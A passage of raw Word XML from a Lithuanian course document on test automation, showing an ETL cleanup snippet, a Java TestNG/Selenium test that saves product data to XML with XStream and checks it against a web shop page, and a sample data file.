                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="84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bookmarkStart w:id="843" w:name="_Toc14393035"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>DELETE FROM oc_currency WHERE title="$title"</w:t>
            </w:r>
            <w:bookmarkEnd w:id="84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44" w:name="_Toc14393036"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="844"/>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845" w:name="_Toc14393037"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>&lt;/etl&gt;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="845"/>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5F4BFA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TESTINIŲ DUOMENŲ PARUOŠIMAS ĮVAIRIŲ FORMATŲ FAILUOSE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pavyzd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46" w:name="_Toc14393038"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.....</w:t>
            </w:r>
            <w:bookmarkEnd w:id="846"/>
          </w:p>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47" w:name="_Toc14393039"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>import com.thoughtworks.xstream.XStream;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="847"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="848" w:name="_Toc14393040"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public class InputDataFromXMLTest {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="848"/>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49" w:name="_Toc14393041"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private DataReader dataReader = new DataReader();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="849"/>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0" w:name="_Toc14393042"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private PageMethods onPage = new PageMethods();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="850"/>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1" w:name="_Toc14393043"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>private WebDriver driver;</w:t>
            </w:r>
            <w:bookmarkEnd w:id="851"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:firstLine="709"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>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2" w:name="_Toc14393044"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@BeforeClass</w:t>
            </w:r>
            <w:bookmarkEnd w:id="852"/>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3" w:name="_Toc14393045"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Parameters("webSiteAddress") // Use Parameters.xml</w:t>
            </w:r>
            <w:bookmarkEnd w:id="853"/>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4" w:name="_Toc14393046"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void setUp(String webSiteAddress) {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="854"/>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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="855" w:name="_Toc14393047"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver = new ChromeDriver();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="855"/>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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="856" w:name="_Toc14393048"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.get(webSiteAddress);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="856"/>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7" w:name="_Toc14393049"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="857"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:firstLine="709"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>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8" w:name="_Toc14393050"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@AfterClass</w:t>
            </w:r>
            <w:bookmarkEnd w:id="858"/>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59" w:name="_Toc14393051"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void close() {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="859"/>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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="860" w:name="_Toc14393052"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>driver.close();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="860"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:ind w:firstLine="709"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="861" w:name="_Toc14393053"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="861"/>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62" w:name="_Toc14393054"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Test(priority = 1)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="86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63" w:name="_Toc14393055"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void writeParametersToXMLFileTest() throws IOException {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="863"/>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4" w:name="_Toc14393056"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>// get iPhone parameters from file iPhoneInfo.txt</w:t>
            </w:r>
            <w:bookmarkEnd w:id="86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5" w:name="_Toc14393057"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>List&lt;String&gt; items = new ArrayList&lt;String&gt;();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="86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6" w:name="_Toc14393058"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>items = dataReader.getTestData("src/test/resources/iPhoneInfo.txt");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="86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7" w:name="_Toc14393059"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>// set iPhone parameters</w:t>
            </w:r>
            <w:bookmarkEnd w:id="86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8" w:name="_Toc14393060"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>iPhone phone = new iPhone();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="86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69" w:name="_Toc14393061"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>phone.setBrand(items.get(0));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="86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0" w:name="_Toc14393062"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>phone.setProductCode(items.get(1));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="87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1" w:name="_Toc14393063"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>phone.setPrice(items.get(2));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="87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2" w:name="_Toc14393064"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>// save iPhone parameters to file iPhone.xml</w:t>
            </w:r>
            <w:bookmarkEnd w:id="872"/>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3" w:name="_Toc14393065"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>XStream xstream = new XStream();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="87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4" w:name="_Toc14393066"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>FileUtils.writeStringToFile(new File("iPhone.xml"), xstream.toXML(phone));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="87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5" w:name="_Toc14393067"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>System.out.println("Data to XML saved");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="87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76" w:name="_Toc14393068"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="876"/>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77" w:name="_Toc14393069"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>@Test(priority = 2)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="87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78" w:name="_Toc14393070"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>public void compareParametersTest() throws IOException {</w:t>
            </w:r>
            <w:bookmarkEnd w:id="87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79" w:name="_Toc14393071"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>// get iPhone parameters from file iPhone.xml</w:t>
            </w:r>
            <w:bookmarkEnd w:id="879"/>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0" w:name="_Toc14393072"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>XStream xstream = new XStream();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="880"/>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1" w:name="_Toc14393073"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>iPhone phone = new iPhone();</w:t>
            </w:r>
            <w:bookmarkEnd w:id="881"/>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2" w:name="_Toc14393074"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>phone = (iPhone) xstream.fromXML(FileUtils.readFileToString(new File("iPhone.xml")));</w:t>
            </w:r>
            <w:bookmarkEnd w:id="882"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pP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lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:bookmarkStart w:id="883" w:name="_Toc14393075"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>//get iPhone parameters from page</w:t>
            </w:r>
            <w:bookmarkEnd w:id="883"/>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4" w:name="_Toc14393076"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>onPage.selectItemFromDesktops(driver, "iPhone");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="884"/>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5" w:name="_Toc14393077"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>List&lt;String&gt; iPhoneInfo = onPage.getInfoAboutItem(driver);</w:t>
            </w:r>
            <w:bookmarkEnd w:id="885"/>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r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>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6" w:name="_Toc14393078"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>// assert</w:t>
            </w:r>
            <w:bookmarkEnd w:id="886"/>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7" w:name="_Toc14393079"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Assert.assertEquals(iPhoneInfo.get(0),phone.getBrand(), "Error in brand name:");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="887"/>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8" w:name="_Toc14393080"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Assert.assertEquals(iPhoneInfo.get(1), phone.getProductCode(), "Error in product code:");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="888"/>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ab/>
            </w:r>
            <w:bookmarkStart w:id="889" w:name="_Toc14393081"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Assert.assertEquals(iPhoneInfo.get(2),phone.getPrice(), "Error in price:");</w:t>
            </w:r>
            <w:bookmarkEnd w:id="889"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:bookmarkStart w:id="890" w:name="_Toc14393082"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="890"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="891" w:name="_Toc14393083"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="891"/>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PhoneInfo.txt turinys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003178F4" w:rsidRPr="00AD4464" w:rsidRDefault="003178F4"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4"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="892" w:name="_Toc14393084"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Apple</w:t>
            </w:r>
            <w:bookmarkEnd w:id="892"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="893" w:name="_Toc14393085"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>product 11</w:t>
            </w:r>
            <w:bookmarkEnd w:id="893"/>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="894" w:name="_Toc14393086"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>$101.00</w:t>
            </w:r>
            <w:bookmarkEnd w:id="894"/>
          </w:p>
          <w:p w:rsidR="000E5A3D" w:rsidRPr="00AD4464" w:rsidRDefault="000E5A3D" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00735282" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2.6.</w:t>
      </w:r>
      <w:r w:rsidR="004F6993">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD0804" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Kurti automatizuotus testus taikant gerąsias praktikas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00DD0804" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
